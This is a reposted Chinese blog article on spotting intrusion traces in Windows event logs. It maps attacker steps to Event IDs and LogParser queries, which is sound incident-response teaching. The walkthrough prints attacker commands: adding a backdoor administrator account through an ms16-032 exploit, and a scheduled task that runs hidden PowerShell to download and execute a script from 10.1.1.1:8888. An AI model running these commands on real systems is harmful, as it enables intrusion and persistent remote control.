[安全]在Windows日志里发现入侵痕迹(转载)

最新推荐文章于 2024-04-22 09:20:50 发布
最新推荐文章于 2024-04-22 09:20:50 发布
阅读量4.5k 收藏 19
点赞数 6
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/V1040375575/article/details/111152665
版权

转载文章来源:Bypass

有小伙伴问:Windows系统日志分析大多都只是对恶意登录事件进行分析的案例,可以通过系统日志找到其他入侵痕迹吗?

答案肯定是可以的,当攻击者获取webshell后,会通过各种方式来执行系统命令。所有的web攻击行为会存留在web访问日志里,而执行操作系统命令的行为也会存在在系统日志。

不同的攻击场景会留下不一样的系统日志痕迹,不同的Event ID代表了不同的意义,需要重点关注一些事件ID,来分析攻击者在系统中留下的攻击痕迹。

我们通过一个攻击案例来进行windows日志分析,从日志里识别出攻击场景,发现恶意程序执行痕迹,甚至还原攻击者的行为轨迹。
1、信息收集

攻击者在获取webshell权限后,会尝试查询当前用户权限,收集系统版本和补丁信息,用来辅助权限提升。
whoami
systeminfo

Windows日志分析:

在本地安全策略中,需开启审核进程跟踪,可以跟踪进程创建/终止。关键进程跟踪事件和说明,如:
4688 创建新进程
4689 进程终止
在这里插入图片描述

我们通过LogParser做一个简单的筛选,得到Event ID 4688,也就是创建新进程的列表,可以发现用户Bypass,先后调用cmd执行whami和systeminfo。Conhost.exe进程主要是为命令行程序(cmd.exe)提供图形子系统等功能支持。

LogParser.exe -i:EVT “SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,’|’) as UserName,EXTRACT_TOKEN(Strings,5,’|’) as ProcessName FROM c:\11.evtx where EventID=4688”

在这里插入图片描述

2、权限提升

通过执行exp来提升权限,获取操作系统system权限,增加管理用户。
ms16-032.exe “whoami”
ms16-032.exe “net user test1 abc123! /add”
ms16-032.exe “net localgroup Administrators test1 /add”
Windows日志分析:

在本地安全策略中,需开启审核账户管理,关键账户管理事件和说明。如:
4720 创建用户
4732 已将成员添加到启用安全性的本地组

在这里插入图片描述

这里会涉及进程创建,主要关注账户创建和管理用户组变更。从Event ID 4720 ,系统新建了一个test用户,从Event ID 4732的两条记录变化,得到一个关键信息,本地用户test从user组提升到Administrators。

3、管理账号登录

在创建管理账户后,尝试远程登录到目标主机,获取敏感信息。
mstsc /v 10.1.1.188
Windows日志分析:

在本地安全策略中,需开启审核登录事件,关键登录事件和说明,如:
4624 登录成功
4625 登录失败

在这里插入图片描述

LogParser.exe -i:EVT “SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,’|’) as EventType,EXTRACT_TOKEN(Strings,5,’|’) as username,EXTRACT_TOKEN(Strings,18,’|’) as Loginip FROM C:\3333.evtx where EventID=4624”

使用LogParser做一下分析,得到系统登录时间,登录类型10 也就是远程登录,登录用户 test,登录IP:10.1.1.1。

在这里插入图片描述

4、权限维持

通过创建计划任务执行脚本后门,以便下次直接进入,使用以下命令可以一键实现:
schtasks /create /sc minute /mo 1 /tn “Security Script” /tr “powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(””“http://10.1.1.1:8888/logo.txt”""))""
Windows日志分析:

在本地安全策略中,需开启审核对象访问,关键对象访问事件,如:
4698 创建计划任务
4699 删除计划任务

在这里插入图片描述

这里涉及进程创建和对象访问事件,包括schtasks.exe进程的创建和Event ID 4698发现新建的计划任务。成功找到计划任务后门位置:

在这里插入图片描述

转载学习!!!非原创!!!

pandarking
关注
  • 6
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全--Windows入侵排查
songbai220
12-12 865
Windows入侵排查 Windows入侵排查思路 1、检查系统账号安全 1、查看服务器是否有弱口令,远程管理端口是否对公网开放 检查方法:根据实际情况咨询相关服务器管理员,或者授权爆破 2、查看服务器是狗存在可疑、新增账号 检查方法:cmd输入lusrmgr.msc,查看是否有新增、可以账号,如有管理员群组的(administrators)的新增账户,立即禁用或者删除 3、查看服务器是否存在隐藏账号、克隆账号 检查方法:1、打开注册表,查看管理员对应键值 2、使用D盾Web查杀攻击
服务器攻击方式与查看服务器攻击日志的方法
Qq1014136047的博客
12-30 2792
网络攻击仍然是大家很头疼的问题,目前还是有很多网站在网络攻击的威胁中,网络攻击带来的后果,相信大家都明白,那么攻击服务器的方式有哪些?怎么查看服务器攻击日志?如何预防服务器被攻击? 一、常见的攻击服务器的方式有哪些? SQL注入:攻击者通过URL将SQL语句注入程序,进而破坏数据库。还有黑客将非法数据送达后台,导致程序报错; 网络嗅探:攻击者抓取口令和内容,从而探取用户的账户密码; 拒绝服务:攻击者向目标服务器重复发送大量请求,导致服务器无法承载而出现“拒绝服务”; 种植木马:通过服务器植入木..
windows入侵安全排查分析1
08-08
2、查看服务器是否存在可疑账号、新增账号 3、查看服务器是否存在隐藏账号、克隆账号 4、结合日志,查看管理员登录时间、用户名是否存在异常 2、webshell查
Windows日志分析
最新发布
weixin_56233402的博客
04-22 3238
Windows系统日志是记录系统中硬件、软件和系统问题的信息,同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹Windows主要有以下三类日志记录系统事件:应用程序日志、系统日志安全日志。系统日志记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。
服务器入侵日志分析(一)——mysql日志位置确定
redwand的博客
12-23 2005
安全应急响应工作中,一项重要任务就是要对mysql数据库的日志进行分析。工作中,我们通过对mysql日志记录的审计,发现攻击行为,进而追溯攻击源。
应急响应实战笔记——日志分析篇:① Windows 日志分析
君逍遥o
03-27 2274
Windows系统日志是记录系统中硬件、软件和系统问题的信息,同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹Windows主要有以下三类日志记录系统事件:应用程序日志、系统日志安全日志。系统日志记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。
阅读笔记-通过网络日志来检测攻击
梦想闹钟
06-02 304
最近在研究通过网络日志来检测网络攻击,在这记录下读过的相关文章, 文章来源主要是ACM Digital Library Highly Predictive Blacklisting 1.文章主要介绍了一种设置网络黑名单的方法 2. 首先需要对日志进行一些过滤,如先筛去无效ip产生的日志,对常见的网站爬虫设置白名单, 同时排除了源端口为53 (DNS), 25 (SMTP), 80 (HTTP), 443 (VPN), 目的端口为 TCP 53 (DNS) 25 (SMTP)的网络日志条目,因为防火墙
快速掌握典型入侵日志分析
weixin_33727510的博客
11-16 1367
如今各式各样的Windows漏洞层出不穷,五花八门的入侵工具更是令人眼花缭乱,稍微懂点网络知识的人都可以利用各种入侵工具进行入侵,这可给我们的网管带来了很大的麻烦,虽然经过精心配置的服务器可以抵御大部分入侵,但随着不断新出的漏洞,再高明的网管也不敢保证一台务器长时间不会被侵入,所以,安全配置服务器并不能永远阻止黑客入侵,而如何检测入侵者行动以保证服务器安...
转载】linux入侵日志分析
weixin_30347335的博客
06-18 811
日志也是用户应该注意的地方之一。不要低估日志文件对网络安全的重要作用,因为日志文件能够详细记录系统每天发生的各种各样的事件。用户可以通过日志文件 检查错误产生的原因,或者在受到攻击和黑客入侵时追踪攻击者的踪迹。日志的两个比较重要的作用是:审核和监测。配置好的Linux的日志非常强大。对于 Linux系统而言,所有的日志文件都在/var/log下。默认情况下,Linux的日志文件已经足够...
windows入侵排查
qq_55894976的博客
04-01 299
a、开始--运行--输入msinfo32,依次点击“软件环境→正在运行任务”就可以查看到进程的详细信息,比如进程路径、进程ID、文件创建日期、启动时间等。b、单击开始菜单 >【运行】,输入 msconfig,查看是否存在命名异常的启动项目,是,则取消勾选命名异常的启动项目,并到命令中显示的路径删除文件。a、登录服务器,单击【开始】>【所有程序】>【启动】,默认情况下此目录在是一个空目录,确认是否有非。a、单击【开始】>【设置】>【控制面板】>【任务计划】,查看计划任务属性,便可以发现木马文件的路。
Windows入侵溯源分析
Bird&Bird
11-19 3720
目录溯源分析的目的溯源分析的思路系统补丁检测恶意用户排查系统日志排查服务web服务漏洞检查其他服务漏洞检查恶意进程排查检查启动项、计划任务、服务文件敏感目录排查后门文件排查病毒/木马检测网络异常网络连接排查异常流量分析 溯源分析的目的 1、确定入侵的时间和途径 2、定位病毒/木马位置 3、确定攻击轨迹和危害 4、取样分析 5、病毒/木马清除 溯源分析的思路 围绕上述目的,可从系统、服务、文件、网络四个部分进行,每部分相互重叠、相互关联。 一:从系统层面确定大概的入侵时间,然后从服务角度确定入侵途径和入侵类型
日志审计】基于ELK搭建日志服务
qdsec的博客
06-13 1037
解决业务日志无监控、无审计,若出现攻击行为无感知问题。
经验分享:排查主机排查是否入侵
CCIE21820的博客
09-23 784
经验分享:排查主机排查是否入侵
实验十:Web日志审计
kelxLZ的博客
06-01 1535
苏煜程 031803108 一、实验目的 让学生了解如下信息,并掌握具体的日志分析方法: 分析网站服务器(Web Server)日志是网站分析的重要方法 服务器日志记录了网站服务器的许多运行信息,这些信息能够帮助安全管理人员分析网站的流量和访问者在网站上的行为 二、实验原理 Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行安全分析,不仅可以帮助网络管理员实时了解服务器的安全状况,还可以在网站被已经被黑客攻击造成经济损失的情况下,帮助分析安全攻击行为特征、溯.
ssh日志审计_linux查看ssh用户登录日志与操作日志
weixin_30140093的博客
01-17 5513
本文章来给各位同学介绍一下关于linux查看ssh用户登录日志与操作日志,登录日志只要在linux中就可以查看了,如果是操作日志我们需要自己先增加,然后再可以直接查看了,下面我都举了实例说明。ssh用户登录日志linux下登录日志在下面的目录:代码如下cd /var/log查看ssh用户的登录日志:代码如下less secure1. 日志简介日志对于安全来说,非常重要,他记录了系统每天发生的各种...
[日志分析] Access Log 日志分析
weixin_30251587的博客
04-29 1742
0x00.前言: 如何知道自己所在的公司或单位是否被入侵了?是没人来“黑”,还是因自身感知能力不足,暂时还没发现入侵检测是每个安全运维人员都要面临的严峻挑战。安全无小事,一旦入侵成功,后果不堪设想。   随着高危端口的加固,很多黑客直接可利用的漏洞攻击手法都会失效。但是web服务,不是所有的企业或单位都可以关掉的。于是,基于PHP、Java、ASP等动态的web服务漏洞就变...
Windows 系统安全事件应急响应
daheshuiman的博客
04-13 1663
日志记录了系统中硬件、软件和系统问题的信息,同时还监视着系统中发生的事件。当服务器被入侵或者系统(应用)出现问题时,管理员可以根据日志迅速定位问题的关键,再快速处理问题,从而极大地提高工作效率和服务器的安全性。Widdows 通过自带事件查看器管理日志,使用命令打开,或者 Windows 10 搜索框直接搜索事件查看器,或者使用开始菜单Windows 管理工具事件查看器打开。Windows 日志位置日志审核策略,使用命令Wifi.etlWindows 日志系统日志
windows日志的保护与伪造
weixin_33940102的博客
03-08 138
windows日志的保护与伪造 日志对于系统安全的作用是显而易见的,无论是网络管理员还是***都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的***往往会在***成功后迅速清除掉对自己不利的日志。下面我们就来讨论一下日志安全和创建问题。 一:概述:Windows2000的系统日志文件有应用程序日志安全日志、系统日志、DNS服务器日志...
来无影 去无踪--windows日志清除 、日志解读、入侵取证
www.i201314.net
04-26 3369
WIN2000,WINXP (一般win7以下版本) 应用程序日志安全日志、系统日志、FTP日志、WWW日志、DNS服务器日志等等 应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT  安全日志文件:%systemroot%\system32\config\SecEvent.EVT  系统日志文件:%systemroot%\system3
python查询windows安全日志
03-24
可以使用 PyWin32 库编写 Python 脚本来查询 Windows 安全日志。这个库提供了一个名为 win32evtlog 模块,可以让你访问 Windows Event Log 并在其中查询想要的信息。以下是简单的使用示例: ```python import win32evtlog def print_event(event): print("Event Category:", event.EventCategory) print("Time Generated:", event.TimeGenerated) print("Source Name:", event.SourceName) print("Event ID:", event.EventID) print("Event Type:", event.EventType) print("User:", event.StringInserts[-1]) print("Computer Name:", event.ComputerName) print("Description:", event.StringInserts[-2]) server = 'localhost' # or remote machine name logtype = 'Security' hand = win32evtlog.OpenEventLog(server, logtype) flags = win32evtlog.EVENTLOG_BACKWARDS_READ|win32evtlog.EVENTLOG_SEQUENTIAL_READ events = win32evtlog.ReadEventLog(hand, flags, 0) numevents = 0 for event in events: numevents += 1 print("Event #:", numevents) print_event(event) print("\n") win32evtlog.CloseEventLog(hand) ``` 此脚本将打印出 Windows 安全日志中的信息,你可以更改 print_event 函数来提取你所需的具体信息。关于 win32evtlog 模块的更多信息,可以参考官方文档:https://github.com/mhammond/pywin32

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值